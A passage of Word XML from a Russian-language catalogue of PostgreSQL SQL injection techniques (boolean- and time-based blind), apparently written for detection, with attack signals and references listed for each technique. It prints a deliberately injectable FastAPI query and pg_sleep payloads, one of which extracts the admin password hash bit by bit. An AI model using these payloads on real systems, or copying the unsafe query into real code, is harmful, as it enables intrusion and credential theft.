          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, вычисляет оба, возвращает строки только если оба TRUE. Самая базовая семантика SQL.</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Уязвимая точка инъекции в булевом контексте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AND</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 основа SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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появилась подстрока </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND (SELECT ...)</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OR (SELECT ...)</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&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</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Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND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 появилось обращение к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current_database()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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> каталогам.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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повторяющаяся форма с растущим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substring(..., N, 1)</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В access-логе: чередующиеся длины response body — короткий (пусто) и длинный (есть строки) — следуют друг за другом в ритме бинарного поиска.</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3.3.1, 3.3.2, 3.2.3, 3.4.</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PortSwigger SQL injection cheat sheet — Conditional responses; HackTricks: PostgreSQL injection; OWASP: Blind SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1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как boolean primitive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.2 Bit-by-bit extraction через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ascii()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.3 Row-count канал через tautology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использованные источники из research: нет — категория покрывается официальной документацией PostgreSQL и стандартными SQLi-cheat-sheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based blind — последняя линия эскалации, когда закрыты UNION, error-based, HTTP-status oracle, row-count oracle. Атакующий заставляет сервер задержать ответ на N секунд при истинном условии и читает данные по различию latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Концептуально это тот же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-oracle, что в 3.3, только условие активирует не подмену row-count, а вызов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Все техники extraction-а (бинарный поиск,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ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) переносятся из 3.3.2 без изменений — меняется только канал наблюдения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура категории:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1 —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как базовый примитив.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.2 — амплификация через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для оценок latency без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3.4.3 — рекурсивный CTE как тяжёлая нагрузка, ещё один обход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-фильтра.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.4 —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как пассивная защита и фактор моделирования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория самая медленная из всех extraction-каналов: каждый бит ~N секунд (типично N=2–5). Bcrypt-хеш — порядка 20 минут даже с параллелизацией. Зато техника устойчива к большинству WAF, и единственный способ её нивелировать на стороне БД —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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1 `pg_sleep` в `CASE WHEN`</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pg_sleep(seconds)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> блокирует backend на указанное время. Помещённый в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-ветку </w:t>
      </w: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он вызывается только при истинном условии.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</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Базовый oracle:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN current_user = 'app_user' THEN pg_sleep(3) ELSE pg_sleep(0) END)</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CASE WHEN current_user = 'app_user' THEN pg_sleep(3) ELSE pg_sleep(0) END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Замечание про типы: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возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">void</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WHERE id = void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не приведётся — запрос упадёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">operator does not exist: integer = void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. С точки зрения атакующего нужна задержка до того, как запрос упадёт. Если хочется чище:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</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CASE WHEN current_user = 'app_user' THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие истинно: backend спит 3 секунды, latency ~3 + базовая.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие ложно: возвращает 1 мгновенно, latency базовая.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Боевой пример — побитовое извлечение:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</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Бинарный oracle через latency. 3 секунды над baseline 50–200 мс надёжно различимы. Для извлечения 60-байтного bcrypt-хеша при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">delay=3</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60 × 7 × 3 = 1260</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> секунд ≈ 21 минута последовательно. С параллелизацией — несколько минут.</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pg_sleep(seconds)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> реализована через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WaitLatch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с timeout-ом. Доступна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по умолчанию. PG-планировщик не вычисляет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спекулятивно. Для безопасности атакующий пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT 1 FROM pg_sleep(N))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — явный subquery, гарантированно вычисляемый в runtime.</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по умолчанию. Latency-канал должен быть наблюдаем.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либо отключён, либо больше выбранного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">delay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.4.4).</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Общие сигналы посимвольного extraction — см. 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Повторяющийся response latency ~N секунд (3, 5, 10 — типичные значения).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Любое появление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от application-роли. В application SQL нет ни одного легитимного контекста для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это инструмент для тестирования и для атак. Однозначный сигнал.</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стабильна с 8.2.</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3.4.2, 3.4.3, 3.4.4, 3.3.1, 3.3.2.</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PortSwigger SQL injection cheat sheet — Time-based blind; HackTricks: PostgreSQL injection — Time based; PostgreSQL Documentation: System Administration Functions — Delaying Execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
